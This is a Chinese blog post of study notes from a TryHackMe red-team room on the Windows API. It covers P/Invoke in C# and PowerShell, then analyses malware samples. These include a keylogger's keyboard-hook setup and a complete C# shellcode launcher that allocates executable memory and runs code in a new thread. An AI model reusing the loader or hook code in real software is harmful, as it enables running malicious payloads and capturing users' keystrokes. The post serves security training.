TryHackMe-红队-17_Windows API简介

最新推荐文章于 2024-02-18 16:57:19 发布
最新推荐文章于 2024-02-18 16:57:19 发布
阅读量384 收藏 1
点赞数
分类专栏: 我的网络安全之旅-TryHackMe 文章标签: windows TryHackMe Windows API .NET C#
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54704239/article/details/129945948
版权

Windows API 简介

其实很早之前我就完成了红队路径,只是没写笔记,现在开始复习一下红队,根据大佬的建议,我们直接只看 .NET C#相关的利用

了解如何与 win32 API 交互并了解其广泛的用例

Windows API 提供本机功能来与 Windows 操作系统的关键组件进行交互。该 API 被许多人广泛使用,包括红队成员、威胁参与者、蓝队成员、软件开发人员和解决方案提供商。

该API可以与Windows系统无缝集成,提供其一系列用例。您可能会看到Win32 API被用于攻击性工具和恶意软件开发,EDR(Endpoint Detection&Response)工程以及通用软件应用程序。

Windows API 的组件

Win32 API(通常称为 Windows API)具有多个依赖组件,用于定义 API 的结构和组织。

让我们通过自上而下的方法分解 Win32 API。我们假设 API 是顶层,构成特定调用的参数是底层。在下表中,我们将在较高层次上描述自上而下的结构,并在后面更详细地介绍。

在这里插入图片描述

OS Libraries

Win32 库的每个 API 调用都驻留在内存中,并且需要一个指向内存地址的指针。由于 ASLR(Address Space Layout Randomization)实现,获取指向这些函数的指针的过程被模糊了;每种语言或包都有一个独特的过程来克服 ASLR。在整个房间中,我们将讨论两个最流行的实现:P/InvokeWindows 头文件

Windows 头文件

微软已经发布了Windows头文件,也称为Windows加载程序,作为与ASLR实现相关的问题的直接解决方案。将概念保持在较高级别,在运行时,加载程序将确定正在进行哪些调用,并创建一个 thunk 表来获取函数地址或指针。

一旦windows.h文件包含在非托管程序的顶部;可以调用任何 Win32 函数

P/Invoke

一种允许您从托管代码访问非托管库中的结构、回调和函数的技术

P/invoke 提供的工具用于处理从托管代码调用非托管函数的整个过程,换句话说,调用 Win32 API。P/invoke 将通过导入包含非托管函数或 Win32 API 调用的所需 DLL 来启动。

微软官方示例:

using System;
using System.Runtime.InteropServices;

public class Program
{
    // Import user32.dll (containing the function we need) and define
    // the method corresponding to the native function.
    [DllImport("user32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    private static extern int MessageBox(IntPtr hWnd, string lpText, string lpCaption, uint uType);

    public static void Main(string[] args)
    {
        // Invoke the function as a regular managed method.
        MessageBox(IntPtr.Zero, "Command-line message box", "Attention!", 0);
    }
}

API 调用结构

API 调用是 Win32 库的第二个主要组件。这些调用提供了可扩展性和灵活性,可用于满足大量用例。大多数 Win32 API 调用在 Windows API 文档和 pinvoke.net 下都有很好的记录。

我们将介绍 API 调用的命名方案和输入/输出参数。

可以通过修改命名方案和附加表示字符来扩展 API 调用功能。下表列出了微软支持其命名方案的字符。

在这里插入图片描述

例如VirtualAllocEx和VirtualAlloc,VirtualAllocEx额外提供了在另一个进程的地址空间中分配内存

在这里插入图片描述

.NET 和 Powershell的API实现

C#

P/Invoke 允许我们导入 DLL 并将指针分配给 API 调用。

为了理解 P/Invoke 是如何实现的,让我们通过下面的示例直接进入它,并在后面讨论各个组件。

示例:

GetComputerNameA:

BOOL GetComputerNameA(
  [out]     LPSTR   lpBuffer,
  [in, out] LPDWORD nSize
);

C#:

class Win32 {
	[DllImport("kernel32")]
	public static extern IntPtr GetComputerNameA(StringBuilder lpBuffer, ref uint lpnSize);
}

static void Main(string[] args) {
	bool success;
	StringBuilder name = new StringBuilder(260);
	uint size = 260;
	success = GetComputerNameA(name, ref size);
	Console.WriteLine(name.ToString());
}

第二行通过DllImport特性来导入kernel32 dll,第三行通过extern关键字定义导入的函数。根据微软官方的说明,函数签名必须与其一致

Powershell

让我们看看如何调整相同的语法以在 PowerShell 中工作。

得益于.net是一家,他们有着类似的语法来实现

$MethodDefinition = @"
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr GetModuleHandle(string lpModuleName);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
"@;

但 PowerShell 需要进一步执行一个步骤才能初始化它们。我们必须在方法定义中为每个 Win32 DLL 的指针创建一个新类型。函数 Add-Type 将临时文件放在 /temp 目录并编译所需的函数 csc.exe.下面是正在使用的函数的示例。

$Kernel32 = Add-Type -MemberDefinition $MethodDefinition -Name 'Kernel32' -NameSpace 'Win32' -PassThru;

现在,我们可以将所需的 API 调用与以下语法一起使用。

[Win32.Kernel32]::<Imported Call>()

常见的 被滥用的API调用

Win32 库中的多个 API 调用很容易被恶意活动利用。下表列出了样本集合中按频率组织的最常被滥用的 API

在这里插入图片描述

恶意软件案例研究

在此任务中,我们将分解 C# 键盘记录器和外壳代码启动器。

键盘记录器

下面是恶意软件示例源代码的 p/invoke 定义的片段。

[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool UnhookWindowsHookEx(IntPtr hhk);
[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr GetModuleHandle(string lpModuleName);
private static int WHKEYBOARDLL = 13;
[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr GetCurrentProcess();

在这里插入图片描述

为了保持本案例研究的道德完整性,我们将不介绍示例如何收集每个击键。我们将分析示例如何在当前进程上设置钩子。下面是恶意软件示例源代码的挂钩部分的片段。

public static void Main() {
	_hookID = SetHook(_proc);
	Application.Run();
	UnhookWindowsHookEx(_hookID);
	Application.Exit();
}
private static IntPtr SetHook(LowLevelKeyboardProc proc) {
	using (Process curProcess = Process.GetCurrentProcess()) {
		return SetWindowsHookEx(WHKEYBOARDLL, proc, GetModuleHandle(curProcess.ProcessName), 0);
	}
}

ShellCode启动器

要开始分析 shellcode 启动器,我们需要再次收集它正在实现哪些 API 调用。此过程应与前面的案例研究相同。下面是恶意软件示例源代码的 p/invoke 定义的片段。

private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);

在这里插入图片描述

UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
IntPtr pinfo = IntPtr.Zero;
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
return;

这里首先使用VirtualAlloc为shellcode分配一块虚拟内存空间,然后通过Marshal.Copy函数将shellcode写入该内存,然后使用CreateThread创建线程并执行,WaitForSingleObject等待线程完成

Sugobet
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
PowerShell中调用Win32API
Windows PowerShell
06-03 4703
调用Win32 API, 取得网络文件夹的剩余空间. 用户无需挂载磁盘即可取得结果$a = Add-Type -memberDefinition @"[DllImport("Kernel32.dll")]public static extern bool GetDiskFreeSpaceEx(string lpDirectoryName,out long lpFreeBytesAvailabl
浅谈Windows API编程 (这个经典)
weixin_34248849的博客
11-28 3971
浅谈Windows API编程 2007年10月20日星期六 20:29 WinSDK是编程中的传统难点,个人写的WinAPI程序也不少了,其实之所以难就难在每个调用的API都包含着Windows这个操作系统的潜规则或者是windows内部的运行机制……WinSDK是编程中的传统难点,曾经听有一个技术不是很好的朋友乱说什么给你API谁都会用,其实并非那么简单,个人写的WinAPI程序也不...
powershell Win32 API:本地用户管理(番外:Win32 错误处理)
最新发布
2401_82910308的博客
02-18 6703
未经允许不得转载,转载时请标注来源;禁止用作商业及其他衍生目的。有误请指正,侵权请联系删除。有更好的方法也请联系我求赞,关注,评论主要目的:实现错误处理(本系列所有$result对应的变量都为错误代码,有时作者可能不会进行错误处理,但请自行补充。
StringBuffer,StringBuilder的引入
棉花糖的博客
08-15 902
StringBuffer,StringBuilder的引入(末尾有经典面试题) 我们知道String类每次拼接一个字符串,系统都为之开辟一个新的内存空间,这样既耗时又占用了大量的空间,所以在Java中提供了StringBuffer,StringBuilder来减少内存空间的使用率 StringBuffer是一个字符串缓冲区,可以理解为字符串的容器 StringBuffer() :构造一个其中不...
9.3 Ret2Libc 实战之利用VirtualProtect
qq_55202378的博客
11-08 1859
VirtualProtect DEP绕过
x32 Inline Hook 代码封装
CSDN
09-11 7271
Hook 技术常被叫做挂钩技术,挂钩技术其实早在DOS时代就已经存在了,该技术是Windows系统用于替代DOS中断机制的具体实现,钩子的含义就是在程序还没有调用系统函数之前,钩子捕获调用消息并获得控制权,在执行系统调用之前执行自身程序,简单来说就是函数劫持. HOOK技术的实现方法比较多,常见的HOOK方法有 Inline Hook、IAT Hook、EAT Hook 这三种,钩子的应用范围非...
goby-红队专用版-for-Windows
12-15
goby_红队专用版_for_Windowsgoby_红队专用版_for_Windowsgoby_红队专用版_for_Windowsgoby_红队专用版_for_Windowsgoby_红队专用版_for_Windowsgoby_红队专用版_for_Windowsgoby_红队专用版_for_Windowsgoby_红队...
046-红队之浅谈基于Windows telemetry的权限维持.pdf
09-20
"红队浅谈基于Windows telemetry的权限维持" Windows Telemetry是一种强大的监控工具,红队可以使用它来维持权限,以下是相关知识点: 一、 Windows Telemetry 简介 Windows Telemetry是Windows操作系统中的一个...
linux-红队基础设施自动化部署工具
08-13
红队基础设施自动化部署工具
PSInject-master (12)_inject_UnmanagedPowerShell_UnmanagedPowerSh
09-30
UnmanagedPowerShell通过使用P/Invoke调用Windows API直接与PowerShell引擎交互,而不是通过.NET接口。这种方法可以增加隐蔽性,因为传统的反恶意软件可能不会检测到这种非标准的PowerShell使用方式。 在压缩包文件...
057-红队测试之Windows提权小结.pdf
09-20
Windows 提权小结 Windows 提权是指攻击者通过利用操作系统或软件应用程序中的漏洞、设计缺陷或配置错误来获得不允许的访问权限。这种权限升级可以使攻击者获得更高的访问权限,从而控制系统或访问敏感文件。 ...
DLL 注入的三种方法详解
weixin_51409218的博客
02-27 3882
DLL注入的三种方式
Windows API入门简介
jinjazz
06-12 3070
Windows API函数库对于缺乏Windows开发基础知识的人来说实在是太庞大了,以至于想入门却无从下手。其实只要了解一下他的基本模块功能就可以了,具体的实例可以在使用中来参考开发文档,从而慢慢积累。 常用三个模块是User32.dll,Kernel32.dll和gdi32.dll。 user32.dll是Windows用户界面相关应用程序接口.包括窗体创建,销毁,发送消息等,还有ho
API 列表2
cuichen4524的博客
11-29 270
列表2[@more@]Windows API 1.控件与消息函数 AdjustWindowRect 给定一种窗口样式,计算获得目标客户区矩形所需的窗口大小 AnyPopup 判断屏幕上是否存在任何弹出式窗口 ArrangeIco...
Windows API 简介
aisxbng65578的博客
01-11 97
操作系统的作用之一就是屏蔽一些复杂的直接对硬件操作,并提供给用户一个简单明确的应用接口,类外对于一些基本的或常用的操作也以API的形式提供给用户,比如内存管理、文件管理等。 消息传递机制 消息循环是一个进程(线程)活动的源动力。一个进程(线程)再启动并初始化以后便进入了消息循环,它不断处理传递给它的信息,从而不断推动进程(线程)向前运行。 Win32应用程序...
Api函数列表——与文件相关
蝈蝈俊.net
11-30 3646
 Api函数名函数说明适用范围W3.xW95NTmmioWrite写文件否是是WriteFile写文件否是是ExtractAssociatedIcon从文件或相关EXE中获取图标句柄否是是
windows API简介(系列1)
I am here~
02-13 2253
Windows API(windows应用程序接口)用途:微软windows应用程序应用程序接口是为开发者在开发windows应用程序时,提供给应用程序的接口程序,包括Windows XP,Windows 2000,Windows NT,Winows 95/98,以及Windows ME.你可以提供给你的应用程序一些图形设备接口(GDI),显示一些图形和格式化的文本;还可以通过它来管理一些
什么是Windows API
顺其自然~专栏
11-03 6051
Windows 工作原理的中心思想就是“动态链接”概念。Windows 自身带有一大套函数,应用程序就是通过调用这些函数来实现它的用户界面和在屏幕上显示文本和图形的。这些函数都是在动态链接库里实现的。这些文件的名称都带有后缀 .dll,或有时带有 .exe。 Windows 的 3 个主要子系统:内核(kernel),用户(user),GDI。 内核 负责操作系统的传统工作:如 内存管理,文件输入/输出 以及任务管理等。 用户 指的是用户界面,负责所有的窗口管理。 GDI 就是图形设备接口,负责在屏
hydry-8.1-windows
06-19
Hydry-8.1-windows是一个开源的渗透测试工具套件,它主要用于漏洞评估、渗透测试和红队攻击等活动。这个工具套件包含了多个常用的渗透工具,比如NMap、Metasploit等等。它提供了一个图形化的用户界面,方便用户进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值